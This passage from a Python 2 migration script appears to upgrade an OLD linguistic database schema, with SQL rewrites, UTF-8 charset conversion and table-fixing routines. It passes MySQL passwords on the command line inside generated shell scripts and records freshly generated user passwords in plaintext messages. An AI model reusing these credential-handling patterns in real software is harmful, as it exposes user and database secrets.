CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE keyword_id tag_id INT(11) DEFAULT NULL,
ADD KEY (tag_id);
RENAME TABLE gloss TO translation;
ALTER TABLE translation
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE gloss transcription TEXT NOT NULL,
CHANGE glossGrammaticality grammaticality VARCHAR(255) DEFAULT NULL;
RENAME TABLE keyword TO tag;
ALTER TABLE tag
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
MODIFY description TEXT,
ADD UNIQUE (name);
ALTER TABLE language
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `morphology` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script_type` varchar(5) DEFAULT NULL,
`lexicon_corpus_id` int(11) DEFAULT NULL,
`rules_corpus_id` int(11) DEFAULT NULL,
`enterer_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
`generate_attempt` varchar(36) DEFAULT NULL,
`extract_morphemes_from_rules_corpus` tinyint(1) DEFAULT NULL,
`rules_generated` text,
`rules` text,
`rich_morphemes` tinyint(1) DEFAULT NULL,
`parent_directory` varchar(255) DEFAULT NULL,
`word_boundary_symbol` varchar(10) DEFAULT NULL,
`rare_delimiter` varchar(10) DEFAULT NULL,
`morpheme_delimiters` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lexicon_corpus_id` (`lexicon_corpus_id`),
KEY `rules_corpus_id` (`rules_corpus_id`),
KEY `enterer_id` (`enterer_id`),
KEY `modifier_id` (`modifier_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
CREATE TABLE `morphologybackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`morphology_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script_type` varchar(5),
`lexicon_corpus` text,
`rules_corpus` text,
`enterer` text,
`modifier` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
`generate_attempt` varchar(36) DEFAULT NULL,
`extract_morphemes_from_rules_corpus` tinyint(1) DEFAULT NULL,
`rules` text,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE page
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN html TEXT,
CHANGE markup markup_language VARCHAR(100) DEFAULT NULL,
MODIFY content TEXT;
UPDATE page SET markup_language='restructuredText';
ALTER TABLE phonology
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY description TEXT,
MODIFY script TEXT,
ADD COLUMN compile_succeeded tinyint(1) DEFAULT NULL,
ADD COLUMN compile_message VARCHAR(255) DEFAULT NULL,
ADD COLUMN compile_attempt VARCHAR(36) DEFAULT NULL,
ADD COLUMN parent_directory varchar(255) DEFAULT NULL,
    ADD COLUMN word_boundary_symbol varchar(10) DEFAULT NULL,
ADD FOREIGN KEY (modifier_id) REFERENCES user(id),
ADD FOREIGN KEY (enterer_id) REFERENCES user(id);
CREATE TABLE `phonologybackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`phonology_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script` text,
`enterer` text,
`modifier` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE source
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN `crossref_source_id` int(11) DEFAULT NULL,
ADD COLUMN `type` varchar(20) DEFAULT NULL,
ADD COLUMN `key` varchar(1000) DEFAULT NULL,
ADD COLUMN `address` varchar(1000) DEFAULT NULL,
ADD COLUMN `annote` text,
ADD COLUMN `author` varchar(255) DEFAULT NULL,
ADD COLUMN `booktitle` varchar(255) DEFAULT NULL,
ADD COLUMN `chapter` varchar(255) DEFAULT NULL,
ADD COLUMN `crossref` varchar(1000) DEFAULT NULL,
ADD COLUMN `edition` varchar(255) DEFAULT NULL,
ADD COLUMN `editor` varchar(255) DEFAULT NULL,
ADD COLUMN `howpublished` varchar(255) DEFAULT NULL,
ADD COLUMN `institution` varchar(255) DEFAULT NULL,
ADD COLUMN `journal` varchar(255) DEFAULT NULL,
ADD COLUMN `key_field` varchar(255) DEFAULT NULL,
ADD COLUMN `month` varchar(100) DEFAULT NULL,
ADD COLUMN `note` varchar(1000) DEFAULT NULL,
ADD COLUMN `number` varchar(100) DEFAULT NULL,
ADD COLUMN `organization` varchar(255) DEFAULT NULL,
ADD COLUMN `pages` varchar(100) DEFAULT NULL,
ADD COLUMN `publisher` varchar(255) DEFAULT NULL,
ADD COLUMN `school` varchar(255) DEFAULT NULL,
ADD COLUMN `series` varchar(255) DEFAULT NULL,
ADD COLUMN `type_field` varchar(255) DEFAULT NULL,
ADD COLUMN `url` varchar(1000) DEFAULT NULL,
ADD COLUMN `volume` varchar(100) DEFAULT NULL,
ADD COLUMN `affiliation` varchar(255) DEFAULT NULL,
ADD COLUMN `abstract` varchar(1000) DEFAULT NULL,
ADD COLUMN `contents` varchar(255) DEFAULT NULL,
ADD COLUMN `copyright` varchar(255) DEFAULT NULL,
ADD COLUMN `ISBN` varchar(20) DEFAULT NULL,
ADD COLUMN `ISSN` varchar(20) DEFAULT NULL,
ADD COLUMN `keywords` varchar(255) DEFAULT NULL,
ADD COLUMN `language` varchar(255) DEFAULT NULL,
ADD COLUMN `location` varchar(255) DEFAULT NULL,
ADD COLUMN `LCCN` varchar(20) DEFAULT NULL,
ADD COLUMN `mrnumber` varchar(25) DEFAULT NULL,
ADD COLUMN `price` varchar(100) DEFAULT NULL,
ADD COLUMN `size` varchar(255) DEFAULT NULL,
ADD KEY (crossref_source_id);
ALTER TABLE speaker
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE firstName first_name VARCHAR(255) DEFAULT NULL,
CHANGE lastName last_name VARCHAR(255) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
CHANGE speakerPageContent page_content TEXT,
ADD COLUMN html TEXT;
UPDATE speaker SET markup_language='restructuredText';
ALTER TABLE syntacticcategory
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
ADD COLUMN `type` VARCHAR(60) DEFAULT NULL,
MODIFY description TEXT;
ALTER TABLE `user`
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE firstName first_name VARCHAR(255) DEFAULT NULL,
CHANGE lastName last_name VARCHAR(255) DEFAULT NULL,
ADD COLUMN salt VARCHAR(255) DEFAULT NULL,
MODIFY role VARCHAR(100) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
CHANGE personalPageContent page_content TEXT,
ADD COLUMN html TEXT,
ADD COLUMN input_orthography_id INT(11) DEFAULT NULL,
ADD COLUMN output_orthography_id INT(11) DEFAULT NULL,
ADD KEY (input_orthography_id),
ADD KEY (output_orthography_id),
DROP COLUMN collectionViewType;
UPDATE user SET markup_language='restructuredText';
ALTER TABLE userform
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
'''.strip()
def write_update_executable(mysql_update_script_name, here):
"""Write the contents of update_SQL to an executable and return the path to it."""
mysql_update_script = os.path.join(here, mysql_update_script_name)
if not os.path.exists(mysql_update_script):
with open(mysql_update_script, 'w') as f:
f.write(update_SQL)
os.chmod(mysql_update_script, 0744)
return mysql_update_script
# cleanup_SQL performs the final modifications on the database, dropping
# the columns that were retained in update_SQL.
cleanup_SQL = '''
ALTER TABLE applicationsettings
DROP COLUMN objectLanguageOrthography1Name,
DROP COLUMN objectLanguageOrthography1,
DROP COLUMN OLO1Lowercase,
DROP COLUMN OLO1InitialGlottalStops,
DROP COLUMN objectLanguageOrthography2Name,
DROP COLUMN objectLanguageOrthography2,
DROP COLUMN OLO2Lowercase,
DROP COLUMN OLO2InitialGlottalStops,
DROP COLUMN objectLanguageOrthography3Name,
DROP COLUMN objectLanguageOrthography3,
DROP COLUMN OLO3Lowercase,
DROP COLUMN OLO3InitialGlottalStops,
DROP COLUMN objectLanguageOrthography4Name,
DROP COLUMN objectLanguageOrthography4,
DROP COLUMN OLO4Lowercase,
DROP COLUMN OLO4InitialGlottalStops,
DROP COLUMN objectLanguageOrthography5Name,
DROP COLUMN objectLanguageOrthography5,
DROP COLUMN OLO5Lowercase,
DROP COLUMN OLO5InitialGlottalStops,
DROP COLUMN storageOrthography,
DROP COLUMN defaultInputOrthography,
DROP COLUMN defaultOutputOrthography,
DROP COLUMN unrestrictedUsers;
ALTER TABLE collectionbackup
DROP COLUMN backuper;
ALTER TABLE file
MODIFY url VARCHAR(255) DEFAULT NULL;
ALTER TABLE formbackup
DROP COLUMN backuper;
ALTER TABLE source
DROP COLUMN authorFirstName,
DROP COLUMN authorLastName,
DROP COLUMN fullReference;
ALTER TABLE user
DROP COLUMN inputOrthography,
DROP COLUMN outputOrthography;
'''.strip()
def row2dict(row):
"""Turn an SQLA row proxy object into a dict; clone any 'id' keys to 'id_' ones."""
row = dict([(k, normalize(v)) for k, v in dict(row).items()])
try:
row['id_'] = row['id']
except Exception:
pass
return row
def normalize(utf8_str):
"""Return an UTF-8 encoded string decompositionally normalized using NFD."""
try:
result = unicodedata.normalize('NFD', unicode(utf8_str, 'utf8')).encode('utf8')
except Exception:
result = utf8_str
return result
def print_(string):
"""Print to stdout immediately."""
sys.stdout.write(string)
sys.stdout.flush()
def get_db_to_text_script(mysql_db_name, mysql_username, mysql_password):
"""Return a string of shell/mysql commands that will write a subset of the db to stdout."""
script = [
"#!/bin/sh",
"mysql -u %s -p%s -e 'select transcription, phoneticTranscription, \
narrowPhoneticTranscription, morphemeBreak, morphemeGloss from %s.form;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select contents from %s.collection;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select firstName, lastName from %s.user;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'select name from %s.file;'" % (mysql_username, mysql_password, mysql_db_name),
]
return '\n'.join(script)
def write_db_to_text_file(pre_data_dump_name, here, mysql_updater, db_to_text_script):
    """Write a subset of the data in the db to a text file; the output will be used after processing
    to verify data integrity.
"""
print_('Writing a subset of the data in %s to a text file ... ' % mysql_db_name)
with open(mysql_updater, 'w') as f:
f.write(db_to_text_script)
pre_data_dump_path = os.path.join(here, pre_data_dump_name)
with open(pre_data_dump_path, 'w') as f:
subprocess.call([mysql_updater], shell=False, stdout=f, stderr=f)
print 'done.'
return pre_data_dump_path
def write_cleanup_executable(mysql_cleanup_script_name, here):
"""Write the contents of cleanup_SQL to an executable and return the path to it."""
mysql_cleanup_script = os.path.join(here, mysql_cleanup_script_name)
if not os.path.exists(mysql_cleanup_script ):
with open(mysql_cleanup_script , 'w') as f:
f.write(cleanup_SQL)
os.chmod(mysql_cleanup_script , 0744)
return mysql_cleanup_script
def write_charset_executable(mysql_charset_script_name, here):
"""Write to disk as an executable the file that will be used to issue the MySQL
statements that change the character set to UTF-8 -- return the absolute path.
"""
mysql_charset_script = os.path.join(here, mysql_charset_script_name)
if not os.path.exists(mysql_charset_script):
with open(mysql_charset_script, 'w') as f:
pass
os.chmod(mysql_charset_script, 0744)
return mysql_charset_script
def write_updater_executable(mysql_updater_name, here):
"""Write to disk the shell script that will be used to load the various MySQL scripts.
Return the absolute path.
"""
mysql_updater = os.path.join(here, mysql_updater_name)
with open(mysql_updater, 'w') as f:
pass
os.chmod(mysql_updater, 0744)
return mysql_updater
def recreate_database(mysql_db_name, mysql_dump_file, mysql_username, mysql_password, mysql_updater):
"""Drop the database `mysql_db_name` and recreate it using the MySQL dump file.
"""
print_('Dropping database %s, recreating it and loading the data from the dump file %s ... ' % (mysql_db_name, mysql_dump_file))
script = [
"#!/bin/sh",
"mysql -u %s -p%s -e 'drop database %s;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s -e 'create database %s;'" % (mysql_username, mysql_password, mysql_db_name),
"mysql -u %s -p%s %s < %s" % (mysql_username, mysql_password, mysql_db_name, mysql_dump_file),
]
with open(mysql_updater, 'w') as f:
f.write('\n'.join(script))
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def get_non_utf8_tables_columns(mysql_db_name, mysql_username, mysql_password):
"""Return two lists: the names of tables and columns that do not use the UTF-8 character set."""
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/information_schema' % (mysql_username, mysql_password)
info_schema_engine = create_engine(sqlalchemy_url)
tables_table = Table('TABLES', meta, autoload=True, autoload_with=info_schema_engine)
columns_table = Table('COLUMNS', meta, autoload=True, autoload_with=info_schema_engine)
select = tables_table.select().\
where(tables_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(tables_table.c.TABLE_COLLATION != 'utf8_general_ci')
non_utf8_tables = [row['TABLE_NAME'] for row in
info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}).fetchall()]
select = columns_table.select().\
where(columns_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(columns_table.c.COLLATION_NAME != 'utf8_general_ci')
non_utf8_columns = [row['COLUMN_NAME'] for row in
info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}).fetchall()]
return non_utf8_tables, non_utf8_columns
def get_database_info(mysql_db_name, mysql_username, mysql_password):
"""Return information about the character sets and collations used in the database.
"""
columns = {}
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/information_schema' % (mysql_username, mysql_password)
info_schema_engine = create_engine(sqlalchemy_url)
columns_table = Table('COLUMNS', meta, autoload=True, autoload_with=info_schema_engine)
schemata_table = Table('SCHEMATA', meta, autoload=True, autoload_with=info_schema_engine)
db_charset = info_schema_engine.execute(schemata_table.select().where(schemata_table.c.SCHEMA_NAME==mysql_db_name)).\
fetchall()[0]['DEFAULT_CHARACTER_SET_NAME']
tables_table = Table('TABLES', meta, autoload=True, autoload_with=info_schema_engine)
table_collations = dict([(r['TABLE_NAME'], r['TABLE_COLLATION']) for r in
info_schema_engine.execute(tables_table.select().where(tables_table.c.TABLE_SCHEMA==mysql_db_name))])
select = columns_table.select().\
where(columns_table.c.TABLE_SCHEMA == bindparam('mysql_db_name')).\
where(columns_table.c.COLLATION_NAME != None)
for row in info_schema_engine.execute(select, {'mysql_db_name': mysql_db_name}):
columns.setdefault(row['table_name'], {})[row['COLUMN_NAME']] = (row['COLLATION_NAME'], row['COLUMN_TYPE'], row['COLUMN_KEY'])
#tables.setdefault(row['table_name'], []).append({row['COLUMN_NAME']: (row['COLLATION_NAME'], row['COLUMN_TYPE'], row['COLUMN_KEY'])})
return db_charset, table_collations, columns
def get_binary_column_type(column_type):
"""Return an appropriate binary column type for the input one, cf. https://codex.wordpress.org/Converting_Database_Character_Sets."""
try:
return {
'char': 'binary',
'text': 'blob',
'tinytext': 'tinyblob',
'mediumtext': 'mediumblob',
'longtext': 'longblob'
}[column_type.lower()]
except KeyError:
if column_type.lower().startswith('varchar('):
return 'varbinary(%s)' % column_type[8:-1]
return 'blob'
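# For example, given the mapping above:
#     get_binary_column_type('varchar(255)') returns 'varbinary(255)'
#     get_binary_column_type('text')         returns 'blob'
#     get_binary_column_type('mediumtext')   returns 'mediumblob'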
def write_charset_executable_content(mysql_charset_script, mysql_db_name, mysql_username, mysql_password,
db_charset, table_collations, columns):
"""Write a series of MySQL commands to the file at the path in mysql_charset_script; these commands will alter
the tables and columns (and the db) so that they use the UTF-8 character set.
"""
with open(mysql_charset_script, 'w') as f:
if db_charset != 'utf8':
f.write('ALTER DATABASE %s CHARACTER SET utf8;\n\n' % mysql_db_name)
#for table_name, columns in columns_with_collations.items():
for table_name, table_collation in table_collations.items():
if not table_collation == 'utf8_general_ci':
f.write('ALTER TABLE %s CHARACTER SET utf8;\n\n' % table_name)
non_utf8_columns = dict([(c_name, (c_type, c_key)) for c_name, (c_coll, c_type, c_key) in
columns.get(table_name, {}).items() if c_coll != 'utf8_general_ci'])
if non_utf8_columns:
indices = [(c_name, c_key) for c_name, (c_type, c_key) in non_utf8_columns.items() if c_key]
f.write('ALTER TABLE %s\n' % table_name)
if indices:
for c_name, c_key in indices:
if c_key == 'PRI':
f.write(' DROP PRIMARY KEY,\n')
else:
f.write(' DROP INDEX %s,\n' % c_name)
f.write(' %s;\n\n' % ',\n '.join(
['CHANGE `%s` `%s` %s' % (c_name, c_name, get_binary_column_type(c_type))
for c_name, (c_type, c_key) in non_utf8_columns.items()]))
for table_name, columns_dict in columns.items():
non_utf8_columns = dict([(c_name, (c_type, c_key)) for c_name, (c_coll, c_type, c_key) in
columns_dict.items() if c_coll != 'utf8_general_ci'])
indices = [(c_name, c_key) for c_name, (c_type, c_key) in non_utf8_columns.items() if c_key]
if non_utf8_columns:
f.write('ALTER TABLE %s\n' % table_name)
f.write(' %s' % ',\n '.join(
['CHANGE `%s` `%s` %s CHARACTER SET utf8' % (c_name, c_name, c_type) for c_name, (c_type, c_key) in non_utf8_columns.items()]))
if indices:
f.write(',\n')
for index, (c_name, c_key) in enumerate(indices):
if c_key == 'PRI':
f.write(' ADD PRIMARY KEY (`%s`)' % c_name)
else:
f.write(' ADD UNIQUE (`%s`)' % c_name)
if index == len(indices) - 1:
f.write(';\n\n')
else:
f.write(',\n')
else:
f.write(';\n\n')
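# Illustration only: for a hypothetical latin1 table `tag` whose varchar(255)
# `name` column carries a UNIQUE index, the function above emits roughly the
# following two-pass conversion (text column to a binary type, then back to a
# utf8 text type), per the procedure cited in the module docstring:
#
#     ALTER TABLE tag CHARACTER SET utf8;
#
#     ALTER TABLE tag
#         DROP INDEX name,
#         CHANGE `name` `name` varbinary(255);
#
#     ALTER TABLE tag
#         CHANGE `name` `name` varchar(255) CHARACTER SET utf8,
#         ADD UNIQUE (`name`);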
def change_db_charset_to_utf8(mysql_db_name, mysql_charset_script, mysql_username, mysql_password,
mysql_updater, db_charset, table_collations, columns):
"""Run the executable at `mysql_charset_script` in order to change the character set of the db to UTF-8.
Note that this was not working correctly. We need to make sure that MySQL is using UTF-8 everywhere, see
this web page for how to do that: http://cameronyule.com/2008/07/configuring-mysql-to-use-utf-8/.
"""
print_('Changing the character set of the database to UTF-8 ... ')
write_charset_executable_content(mysql_charset_script, mysql_db_name, mysql_username, mysql_password,
db_charset, table_collations, columns)
script = [
"#!/bin/sh",
"mysql -u %s -p%s %s < %s" % (mysql_username, mysql_password, mysql_db_name, mysql_charset_script),
]
with open(mysql_updater, 'w') as f:
f.write('\n'.join(script))
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def perform_preliminary_update(mysql_db_name, mysql_update_script, mysql_username, mysql_password, mysql_updater):
"""Perform the preliminary update of the db by calling the executable at ``mysql_update_script``."""
print_('Running the MySQL update script ... ')
mysql_script_content = '#!/bin/sh\nmysql -u %s -p%s %s < %s' % (mysql_username, mysql_password, mysql_db_name, mysql_update_script)
with open(mysql_updater, 'w') as f:
f.write(mysql_script_content)
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def extract_orthographies_from_application_settings(applicationsettings):
orthographies = []
for i in range(1,6):
if applicationsettings['objectLanguageOrthography%d' % i]:
orthographies.append({
'orthography': applicationsettings['objectLanguageOrthography%d' % i],
'name': applicationsettings['objectLanguageOrthography%dName' % i],
'lowercase': applicationsettings['OLO%dLowercase' % i],
'initial_glottal_stops': applicationsettings['OLO%dInitialGlottalStops' % i],
'datetime_modified': applicationsettings['datetime_modified'],
})
return orthographies
def fix_orthography_table(engine, orthography_table, application_settings_collation):
"""Create some orthography rows using all of the unique orthographies implicit in the applicationsettings table."""
print_('Fixing the orthography table ... ')
if application_settings_collation.startswith('latin'):
engine.execute('set names utf8;')
else:
engine.execute('set names latin1;')
applicationsettings = engine.execute(applicationsettings_table.select()).fetchall()
orthographies_dict = {}
for applicationsetting in applicationsettings:
orthographies = extract_orthographies_from_application_settings(applicationsetting)
for orthography in orthographies:
orthographies_dict.setdefault(
(normalize(orthography['name']), normalize(orthography['orthography']),
orthography['lowercase'], orthography['initial_glottal_stops']), []).\
append(orthography['datetime_modified'])
buffer1 = []
for (name, orthography, lowercase, initial_glottal_stops), dts in orthographies_dict.items():
max_dt_modified = max(dts)
buffer1.append({'name': name, 'orthography': orthography, 'lowercase': lowercase,
'initial_glottal_stops': initial_glottal_stops, 'datetime_modified': max_dt_modified})
engine.execute('set names utf8;')
if buffer1:
insert = orthography_table.insert().values(**dict([(k, bindparam(k)) for k in buffer1[0]]))
engine.execute(insert, buffer1)
print 'done.'
def get_orthographies_by_name(engine):
    """Return a dict mapping each orthography name to the largest id of an orthography with that name."""
orthographies = {}
engine.execute('set names utf8;')
query = 'SELECT id, name FROM orthography;'
result = engine.execute(query).fetchall()
for id, name in result:
orthographies.setdefault(name, []).append(id)
for name, ids in orthographies.items():
orthographies[name] = max(ids)
return orthographies
def collation2charset(collation):
return {'utf8_general_ci': 'utf8'}.get(collation, 'latin1')
def fix_applicationsettings_table(engine, applicationsettings_table, user_table, now_string, table_collations):
"""Fix the applicationsettings table: create the orthography and unrestricted_users relations."""
print_('Fixing the applicationsettings table ... ')
msgs = []
orthographies = get_orthographies_by_name(engine)
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
user_ids = [u['id'] for u in users]
buffer1 = []
for row in engine.execute(applicationsettings_table.select()):
# Convert the orthography references by name to foreign key id references
values = row2dict(row)
if row['storageOrthography']:
orthography_id = getOrthographyReferenced(values['storageOrthography'], values, orthographies)
if orthography_id:
values['storage_orthography_id'] = orthography_id
if row['defaultInputOrthography']:
orthography_id = getOrthographyReferenced(values['defaultInputOrthography'], values, orthographies)
if orthography_id:
values['input_orthography_id'] = orthography_id
if row['defaultOutputOrthography']:
orthography_id = getOrthographyReferenced(values['defaultOutputOrthography'], values, orthographies)
if orthography_id:
values['output_orthography_id'] = orthography_id
buffer1.append(values)
try:
unrestricted_user_ids = json.loads(values['unrestrictedUsers'])
for user_id in unrestricted_user_ids:
if user_id in user_ids:
engine.execute(
"INSERT INTO applicationsettingsuser (applicationsettings_id, user_id, datetime_modified) VALUES (%d, %d, '%s');" % (
values['id'], user_id, now_string))
else:
msgs.append('WARNING: user %d was listed as unrestricted but this user does not exist.\n' % user_id)
except Exception:
pass
if buffer1:
engine.execute('set names utf8;')
update = applicationsettings_table.update().where(applicationsettings_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0].keys() if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_user_table(engine, user_table):
"""Generate new values for password, salt, html, input_orthography_id and output_orthography_id."""
print_('Fixing the user table ... ')
msgs = []
orthographies = get_orthographies_by_name(engine)
try:
engine.execute('set names utf8;')
current_application_settings = engine.execute('SELECT * FROM applicationsettings ORDER BY id DESC LIMIT 1;').fetchall()[0]
except Exception:
current_application_settings = None
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
buffer1 = []
for row in engine.execute(user_table.select()):
values = row2dict(row)
last_name = values['last_name']
first_name = values['first_name']
values['html'] = rst2html(values['page_content'])
values['salt'] = generateSalt()
new_password = generatePassword()
values['password'] = encryptPassword(new_password, values['salt'])
msgs.append('%s %s (%s) now has the password %s' % (first_name, last_name, values['email'], new_password))
if values['role'] not in ('administrator', 'contributor', 'viewer'):
msgs.append('User %d (%s %s) had an invalid role (%s); now changed to viewer' % (values['id'], first_name, last_name, values['role']))
values['role'] = 'viewer'
values['input_orthography_id'] = values['output_orthography_id'] = None
if current_application_settings:
if values['inputOrthography']:
orthography_name = current_application_settings['objectLanguageOrthography%sName' % values['inputOrthography'].split()[-1]]
values['input_orthography_id'] = orthographies.get(orthography_name, None)
if values['outputOrthography']:
orthography_name = current_application_settings['objectLanguageOrthography%sName' % values['outputOrthography'].split()[-1]]
values['output_orthography_id'] = orthographies.get(orthography_name, None)
buffer1.append(values)
engine.execute('set names utf8;')
if buffer1:
update = user_table.update().where(user_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_collection_table(engine, collection_table, collectionbackup_table, user_table):
"""Add UUID, html, contents_unpacked and modifier_id values to the collections. Also,
add UUID values to the backups of each collection. Return a list of collection ids corresponding
to those that reference other collections.
.. note::
There is a somewhat nasty complication that arises because of a change
in how backupers/modifiers are recorded with backups. In the OLD 0.2.7, every
time a backup occurs, the backuper value of the backup is set to the user who
made the backup and this information is not stored in the original. In the OLD 1.0,
creates, updates and deletes all set the modifier value to the user who performed
the action and then this info is copied to the modifier value of the backup. Thus we
must perform the following transformations:
for collection in collections:
if collection has a backuper
then it has been updated, so we should
                set its modifier to the user referenced in the backuper attribute of its most recent backup
else
then it was created but never updated or deleted, so we should
set its modifier to its enterer
for collectionbackup in collectionbackups:
if there are older backups of the same collection
then set the modifier of the present collectionbackup to the backuper value of the most recent such sister backup
else
this is the first backup and its modifier should be its enterer
"""
print_('Fixing the collection table ... ')
collectionReferencePattern = re.compile('[cC]ollection[\[\(](\d+)[\]\)]')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
collectionbackups = engine.execute(collectionbackup_table.select()).fetchall()
buffer1 = []
buffer2 = []
for row in engine.execute(collection_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
values['html'] = rst2html(values['contents'])
values['contents_unpacked'] = values['contents']
backups = sorted([cb for cb in collectionbackups if cb['collection_id'] == values['id']],
key=lambda cb: cb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = values['enterer_id']
                    msgs.append('WARNING: there is no user with id %d to be the most recent backuper for collection %d' % (
most_recent_backuper, values['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for collection %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), values['id'], backups[-1]['backuper']))
values['modifier_id'] = values['enterer_id']
else:
values['modifier_id'] = values['enterer_id']
if collectionReferencePattern.search(row['contents']):
msgs.append('''WARNING: collection %d references other collections; please update this collection via the
OLD interface in order to generate appropriate html and contents_unpacked values.''' % values['id'])
buffer1.append(values)
for cb in backups:
buffer2.append({'cb_id': cb['id'], 'UUID': values['UUID']})
engine.execute('set names utf8;')
if buffer1:
update = collection_table.update().where(collection_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
if buffer2:
update = collectionbackup_table.update().where(collectionbackup_table.c.id==bindparam('cb_id')).\
values(UUID=bindparam('UUID'))
engine.execute(update, buffer2)
print 'done.'
return msgs
def fix_collectionbackup_table(engine, collectionbackup_table):
"""Add html, modifier and (potentially) UUID values to the collections backups."""
print_('Fixing the collectionbackup table ... ')
uuidless = {} # maps collection ids to UUIDs
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
collectionbackups = engine.execute(collectionbackup_table.select()).fetchall()
buffer1 = []
for row in collectionbackups:
values = row2dict(row)
values['html'] = rst2html(values['contents'])
backups = sorted([cb for cb in collectionbackups if cb['collection_id'] == values['collection_id']],
key=lambda cb: cb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = row['enterer']
# Any cbs without UUID values must be from deleted collections
if values['UUID'] is None:
uuid = uuidless.get(values['collection_id'], uuid4())
uuidless[values['collection_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = collectionbackup_table.update().where(collectionbackup_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_elicitationmethod_table(engine, elicitationmethod_table):
print_('Fixing the elicitationmethod table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(elicitationmethod_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
